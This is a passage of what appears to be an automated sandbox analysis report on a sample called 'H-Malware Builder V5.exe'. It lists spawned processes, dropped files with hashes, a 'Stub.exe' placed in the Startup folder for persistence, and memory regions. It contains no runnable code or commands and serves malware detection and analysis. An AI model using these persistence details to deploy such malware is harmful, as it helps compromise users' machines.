                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                          1⤵
                                                                                                                                            PID:4608
                                                                                                                                          • C:\Windows\System32\rundll32.exe
                                                                                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:4968
                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                              C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                              1⤵
                                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                              PID:1616
                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 420 -p 4444 -ip 4444
                                                                                                                                                2⤵
                                                                                                                                                  PID:824

                                                                                                                                              Network

                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                              Replay Monitor

                                                                                                                                              Loading Replay Monitor...

                                                                                                                                              Downloads

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\H-Malware Builder V5.exe.log

                                                                                                                                                Filesize

                                                                                                                                                654B

                                                                                                                                                MD5

                                                                                                                                                2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                                SHA1

                                                                                                                                                684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                                SHA256

                                                                                                                                                e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                                SHA512

                                                                                                                                                1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                Filesize

                                                                                                                                                2KB

                                                                                                                                                MD5

                                                                                                                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                SHA1

                                                                                                                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                SHA256

                                                                                                                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                SHA512

                                                                                                                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                e58749a7a1826f6ea62df1e2ef63a32b

                                                                                                                                                SHA1

                                                                                                                                                c0bca21658b8be4f37b71eec9578bfefa44f862d

                                                                                                                                                SHA256

                                                                                                                                                0e1f0e684adb40a5d0668df5fed007c9046137d7ae16a1f2f343b139d5f9bc93

                                                                                                                                                SHA512

                                                                                                                                                4cf45b2b11ab31e7f67fff286b29d50ed28cd6043091144c5c0f1348b5f5916ed7479cf985595e6f096b586ab93b4b5dce612f688049b8366a2dd91863e98b70

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                b51dc9e5ec3c97f72b4ca9488bbb4462

                                                                                                                                                SHA1

                                                                                                                                                5c1e8c0b728cd124edcacefb399bbd5e25b21bd3

                                                                                                                                                SHA256

                                                                                                                                                976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db

                                                                                                                                                SHA512

                                                                                                                                                0e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                2089d71896d3dff1ed7d1c92e85c4c0f

                                                                                                                                                SHA1

                                                                                                                                                409332ddd6c8e1957701170e53695bcdd06a3ba2

                                                                                                                                                SHA256

                                                                                                                                                7160f2e945b300261ac04fd15e01315f98d25c67b2da56ce34bc50ed4c9040d2

                                                                                                                                                SHA512

                                                                                                                                                5090816837a49e9a3bec8b0eac4c0857b8d0480e6e703b26a7094a2cafde96ad076a8ee3009e19b075c3ae18bbbdf81c04e33d1c1222a928386676cf0aad49c4

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                9bc110200117a3752313ca2acaf8a9e1

                                                                                                                                                SHA1

                                                                                                                                                fda6b7da2e7b0175b391475ca78d1b4cf2147cd3

                                                                                                                                                SHA256

                                                                                                                                                c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb

                                                                                                                                                SHA512

                                                                                                                                                1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                75d224e238a397659d8e5cf458a41143

                                                                                                                                                SHA1

                                                                                                                                                d182d16283d3d864a2e328b677551428c29ad6df

                                                                                                                                                SHA256

                                                                                                                                                6a98fa5e6c5b77722f2bd8c855fd14d6bf545fc35b292252d1dc136b89ed2fee

                                                                                                                                                SHA512

                                                                                                                                                3477f3b4182ffdccc817de4242c8fcba706c193a0de5170cd023f8df3d330487d7e372556524b5a0fe1df56de40923700f3f8368eadf6601970e347cbcf078cc

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                9a7c69e4a18c20845fb298bad1a1ba2d

                                                                                                                                                SHA1

                                                                                                                                                b436bfeb3238b3af7ae09dcfb134bf89ec9e32c0

                                                                                                                                                SHA256

                                                                                                                                                f649676eb191d1916ced7fc80b7e0e72c523b35a866a2e7a985362705ea69d01

                                                                                                                                                SHA512

                                                                                                                                                11243e7273a57ab71a91d48a549012ef587d5089dec349f4ca93d5e587d2e1e1ca65545761719fd34339043af1371c126383db9965307255b23383619f137aec

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                0aa63dbb46d451e47a7a682c64af776d

                                                                                                                                                SHA1

                                                                                                                                                3b0026f2dae8e9c491ccaa40133755779de35aaa

                                                                                                                                                SHA256

                                                                                                                                                9158038718d41172c22a3c1a15852405e3e1c8e2c44fa066328eb1520e5d977b

                                                                                                                                                SHA512

                                                                                                                                                4d2564850c2ab1bc71089412f19147df4a1cd3075aa2039aa894271b333cd9c510b7ba4d70889f24d45d8b366d8b5167abdcf24314e4753420337c7d34e7c43f

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                60945d1a2e48da37d4ce8d9c56b6845a

                                                                                                                                                SHA1

                                                                                                                                                83e80a6acbeb44b68b0da00b139471f428a9d6c1

                                                                                                                                                SHA256

                                                                                                                                                314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

                                                                                                                                                SHA512

                                                                                                                                                5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                0cdce985e08680bca43a011144b09ba5

                                                                                                                                                SHA1

                                                                                                                                                cf15eab9fb33ec31ff683bd816daeb76c1f2bd98

                                                                                                                                                SHA256

                                                                                                                                                5d99de724c29659b705c3b7476d23f9b7258fe608d888dbea46b3eb164b6be8e

                                                                                                                                                SHA512

                                                                                                                                                ccde3d30f37a32278077407172495ac692951aea3f41ee15a96c053d89a760cf0de818653c303fd314d2ad31713015f83ae4edaf21c19a6473aca31e2f423a23

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                8a1d5945d69caaa5ad4650aa92416db8

                                                                                                                                                SHA1

                                                                                                                                                fce5ff33231a7b99c4e54afac0b356aa72c86aef

                                                                                                                                                SHA256

                                                                                                                                                536f6c89e5a645ed4b13768d4e63be2900f010b341e04729e79c04af7af1d567

                                                                                                                                                SHA512

                                                                                                                                                04a94cfc967dccb836f2a51b86f861f77421f57bfc6826b00a63a86df995e0e873b38a5c930a15a173b3ea4e768776a13860206468d1bb7ec614ce93f8143cc2

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                77d622bb1a5b250869a3238b9bc1402b

                                                                                                                                                SHA1

                                                                                                                                                d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                                                                                SHA256

                                                                                                                                                f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                                                                                SHA512

                                                                                                                                                d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                22310ad6749d8cc38284aa616efcd100

                                                                                                                                                SHA1

                                                                                                                                                440ef4a0a53bfa7c83fe84326a1dff4326dcb515

                                                                                                                                                SHA256

                                                                                                                                                55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

                                                                                                                                                SHA512

                                                                                                                                                2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                836B

                                                                                                                                                MD5

                                                                                                                                                5272adccbab74849b6b0b3cc364acb24

                                                                                                                                                SHA1

                                                                                                                                                344c3e200846bba9dff0e14f973d60a3dba960bb

                                                                                                                                                SHA256

                                                                                                                                                bc8c7d0c26f6516dee7f447ae34362df358791aefd299fcccb6d68f9dd47bd47

                                                                                                                                                SHA512

                                                                                                                                                b23f628403d5243fba1f4f97ac3c2c3410b7d23c78f096ec932eebd08ab842e1c52362ca5d592f1bb9212d7f9d3cc4bc7b6364b94d77590a8ad4f9bdc710ed5d

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                1KB

                                                                                                                                                MD5

                                                                                                                                                c2a27973f601be05c5d1cf55465ce361

                                                                                                                                                SHA1

                                                                                                                                                1737fb272f0d432fe23cd127a8b8bf502dfc2ced

                                                                                                                                                SHA256

                                                                                                                                                f2b7e62474f83084984f6b7e4a5bb9f3a2a72902b2001253446edbac5d8d4b0e

                                                                                                                                                SHA512

                                                                                                                                                1e39d2454b79c6e7a3f8c4c1ff76dd68bfef7f562318d3dc7e23d648353dbe99eef0cdaab813aaa80efc2cb4b8f60c8510b9072137acac2a63405006b2409c16

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                1f545274ba19d9199a78f74cd05e8187

                                                                                                                                                SHA1

                                                                                                                                                4036cf78d3f310af42963c8f16ae27c5922b5dff

                                                                                                                                                SHA256

                                                                                                                                                3b4780cb2e226f4b05643c0b512960e694f21b35bbbe84d5c5e97628e1f8909c

                                                                                                                                                SHA512

                                                                                                                                                b0f66a6c32cb7f2f96b51c141ffe7df7f4fd61a792e6a3756f54b6d0df6f48d7a3bda23d46ee1e18a22ac995520fb9c4ca1b444d204bdd8f3e4b8651f59adc0d

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                10fb30dc297f99d6ebafa5fee8b24fa2

                                                                                                                                                SHA1

                                                                                                                                                76904509313a49a765edcde26b69c3a61f9fa225

                                                                                                                                                SHA256

                                                                                                                                                567bcacac120711fc04bf8e6c8cd0bff7b61e8ee0a6316254d1005ebb1264e6a

                                                                                                                                                SHA512

                                                                                                                                                c42ace1ea0923fa55592f4f486a508ea56997fdbe0200016b0fc16a33452fc28e4530129a315b3b3a5ede37a07097c13a0eb310c9e91e5d97bb7ce7b955b9498

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                34f595487e6bfd1d11c7de88ee50356a

                                                                                                                                                SHA1

                                                                                                                                                4caad088c15766cc0fa1f42009260e9a02f953bb

                                                                                                                                                SHA256

                                                                                                                                                0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

                                                                                                                                                SHA512

                                                                                                                                                10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                a83ce2908066654f712d1858746bc3c4

                                                                                                                                                SHA1

                                                                                                                                                14887f0537ce076cdc91801fb5fa584b25f1089f

                                                                                                                                                SHA256

                                                                                                                                                7c32ae0eaa4fef7404ce708744116ab8ea17d9575bbb3b06eb41a443f963456f

                                                                                                                                                SHA512

                                                                                                                                                991b20116815c7db3497d0ede9a216c7b78795e65f898847ffec513692f0c24d146a123725d14a2e1e3efb5744a626dd025a364f2f55f581e21640794a0cc551

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                da5c82b0e070047f7377042d08093ff4

                                                                                                                                                SHA1

                                                                                                                                                89d05987cd60828cca516c5c40c18935c35e8bd3

                                                                                                                                                SHA256

                                                                                                                                                77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

                                                                                                                                                SHA512

                                                                                                                                                7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                97bcb22985b317b8bbb8f06a11a1a52f

                                                                                                                                                SHA1

                                                                                                                                                035cd9359af2c88489516458c39f42f26665ae81

                                                                                                                                                SHA256

                                                                                                                                                f3bc2dd9498ea38cb9b79eab3d8b97f9f71e3662140a965f9c9610fba290715a

                                                                                                                                                SHA512

                                                                                                                                                1dc1d38e1615586965f0b8adcad0b692d952b46f3b5fd7f13598214ffbab36abcc5b9ecd9ff9164865c07acee5ee592fce48892069f5288ce19d77f97e4ff118

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                b22439757dd730b195d66340e200c570

                                                                                                                                                SHA1

                                                                                                                                                41be55abad0e2df4063066c39ae1c8a343cdf8a7

                                                                                                                                                SHA256

                                                                                                                                                c58c42e4dbd6a3fb30c7d801387b343432a5791b8d438fa0d49773f765f60f50

                                                                                                                                                SHA512

                                                                                                                                                f1ec8387796e56b840dd202505d5a7ae78b09a35d4168ec3aa606b61dbc96c6e540d96e56c91bf37cff45adf11bce2a4b62b8bc711be0d47288e92516d4331ea

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                7a451cd1316d70a65910773fee8c3a43

                                                                                                                                                SHA1

                                                                                                                                                d2db32d5037153dd1d94565b51b5b385817a3c3d

                                                                                                                                                SHA256

                                                                                                                                                862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c

                                                                                                                                                SHA512

                                                                                                                                                60887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                6fbe3cab034306ecfb449855e3eafee6

                                                                                                                                                SHA1

                                                                                                                                                c0487617ecb2668f520dad01f4bb8d10f6ef36cb

                                                                                                                                                SHA256

                                                                                                                                                fa5ab7a9425bf1f3ecb0be980f9ce9f507c884c09809a9b4909302f835c9159d

                                                                                                                                                SHA512

                                                                                                                                                e60c36c52ecbff0b86db75aa76b03a35617ccd0f9362f4d57db7cdc7d73568ba36339a5a11659d6a3a1e3001bc4faea4821e6fe034dda8d6080c67739bd0784d

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                2d06ce10e4e5b9e174b5ebbdad300fad

                                                                                                                                                SHA1

                                                                                                                                                bcc1c231e22238cef02ae25331320060ada2f131

                                                                                                                                                SHA256

                                                                                                                                                87d1dd56f12a88907ba5aebca8d555443d6f77ed214497277cc8bcd31c669f2c

                                                                                                                                                SHA512

                                                                                                                                                38cfbeb59605854ae4fcfae8619a6b26bd916148acfb5636383672a3960b45ca41fed5c241f97465129e92eaf78c4c85dcf258f1ab501a2bf771287ce04f76a7

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                b1a1d8b05525b7b0c5babfd80488c1f2

                                                                                                                                                SHA1

                                                                                                                                                c85bbd6b7d0143676916c20fd52720499c2bb5c6

                                                                                                                                                SHA256

                                                                                                                                                adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705

                                                                                                                                                SHA512

                                                                                                                                                346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                aeceee3981c528bdc5e1c635b65d223d

                                                                                                                                                SHA1

                                                                                                                                                de9939ed37edca6772f5cdd29f6a973b36b7d31b

                                                                                                                                                SHA256

                                                                                                                                                b99f3c778a047e0348c92c16e0419fa29418d10d0fec61ad8283e92a094a2b32

                                                                                                                                                SHA512

                                                                                                                                                df48285f38e9284efdbd9f8d99e2e94a46fb5465953421ab88497b73ae06895b98ea5c98796560810a6f342c31a9112ea87e03cd3e267fd8518d7585f492a8fb

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                1226cbe1b9180c106bb1c6df4c56e023

                                                                                                                                                SHA1

                                                                                                                                                b42e0f4e40a8713c0300a8852d7c2a5690e03bbc

                                                                                                                                                SHA256

                                                                                                                                                413900875971fd21b31b0613362ef890e03901dca5bc6d9a2754bf5358d92a7f

                                                                                                                                                SHA512

                                                                                                                                                01caa250c5a3d68cd6dfb9ab3d97c6681aa3f004f1a23fb64dccc74c509a4c6a65fdc7c26d55ff84c1f5d34a91193b697f0834be6059c9bb381c5209033f75bd

                                                                                                                                              • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                                Filesize

                                                                                                                                                290B

                                                                                                                                                MD5

                                                                                                                                                53177082f6ce9b309bad27000bf12660

                                                                                                                                                SHA1

                                                                                                                                                95b7aebb9d8feae08b5c2a4f7059d527b80ac6bb

                                                                                                                                                SHA256

                                                                                                                                                8977d8d6576a7094d6b789a76d5a63126147dff5f588b167cded98175344697d

                                                                                                                                                SHA512

                                                                                                                                                7b75b7a6ed00a7b31f35db2d86cdf0b5238d3f09161b884261fa76e68672838d327eb345490d274b1c577d5aab3b41507f39f03961180fd1df0e2ab5afeac2dc

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe

                                                                                                                                                Filesize

                                                                                                                                                611KB

                                                                                                                                                MD5

                                                                                                                                                515c515dc79e543c37bbfa3726e4eedb

                                                                                                                                                SHA1

                                                                                                                                                26204367d2fb407d04696e0b824472ae37a7792f

                                                                                                                                                SHA256

                                                                                                                                                1ff13dcc9b8d8ff1117a56ea10fdbdc41702c69b0031ebc23ae3978f673c9d31

                                                                                                                                                SHA512

                                                                                                                                                6910bccfc9933a29ef7a11cb09acc89c13f81f23163a62e6ef6cfb01b8819184d052fcacec9ea1005dd3318f3385353d5813078f25076203bae45abd88b29d23

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3mh3gjdb.arp.ps1

                                                                                                                                                Filesize

                                                                                                                                                60B

                                                                                                                                                MD5

                                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                SHA1

                                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                SHA256

                                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                SHA512

                                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe

                                                                                                                                                Filesize

                                                                                                                                                290KB

                                                                                                                                                MD5

                                                                                                                                                cc63633edfcc147cbaed1959b03d8730

                                                                                                                                                SHA1

                                                                                                                                                df7a250eba6ee1767b09f7923bfd735635deb9e8

                                                                                                                                                SHA256

                                                                                                                                                e699d9e9a81e9de82ce7ed645ef2a92ed6231e32cbc18a7e9ddff5c82623d417

                                                                                                                                                SHA512

                                                                                                                                                a584893714d46c6bdf4cc0a097b5f088a9aa49eea07b181745ca9b351b570c8ac3487bfe53a8a97213f5d8a7f71dbf4070ff92eab58b2ff7a4d0e784e17d02d4

                                                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                Filesize

                                                                                                                                                2KB

                                                                                                                                                MD5

                                                                                                                                                f313c5b4f95605026428425586317353

                                                                                                                                                SHA1

                                                                                                                                                06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                SHA256

                                                                                                                                                129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                SHA512

                                                                                                                                                b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                Filesize

                                                                                                                                                2KB

                                                                                                                                                MD5

                                                                                                                                                ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                SHA1

                                                                                                                                                a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                SHA256

                                                                                                                                                98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                SHA512

                                                                                                                                                1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                Filesize

                                                                                                                                                2KB

                                                                                                                                                MD5

                                                                                                                                                7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                SHA1

                                                                                                                                                63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                SHA256

                                                                                                                                                727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                SHA512

                                                                                                                                                f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                Filesize

                                                                                                                                                2KB

                                                                                                                                                MD5

                                                                                                                                                1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                SHA1

                                                                                                                                                5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                SHA256

                                                                                                                                                55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                SHA512

                                                                                                                                                5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                Filesize

                                                                                                                                                2KB

                                                                                                                                                MD5

                                                                                                                                                0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                SHA1

                                                                                                                                                9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                SHA256

                                                                                                                                                a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                SHA512

                                                                                                                                                c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                              • memory/64-55-0x00007FFD9EBD0000-0x00007FFD9EBE0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/64-54-0x000002A51EB70000-0x000002A51EB9A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                168KB

                                                                                                                                              • memory/216-978-0x0000000000510000-0x000000000057C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                432KB

                                                                                                                                              • memory/388-61-0x000002B894760000-0x000002B89478A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                168KB

                                                                                                                                              • memory/388-62-0x00007FFD9EBD0000-0x00007FFD9EBE0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/444-942-0x0000000000880000-0x00000000008EC000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                432KB

                                                                                                                                              • memory/512-66-0x00007FFD9EBD0000-0x00007FFD9EBE0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/512-65-0x00000221D1C90000-0x00000221D1CBA000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                168KB

                                                                                                                                              • memory/608-45-0x000001E81BA30000-0x000001E81BA5A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                168KB

                                                                                                                                              • memory/608-46-0x00007FFD9EBD0000-0x00007FFD9EBE0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/608-44-0x000001E81BA00000-0x000001E81BA23000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                140KB

                                                                                                                                              • memory/668-49-0x000002CD65800000-0x000002CD6582A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                168KB

                                                                                                                                              • memory/668-50-0x00007FFD9EBD0000-0x00007FFD9EBE0000-memory.dmp

                                                                                                                                                Filesize

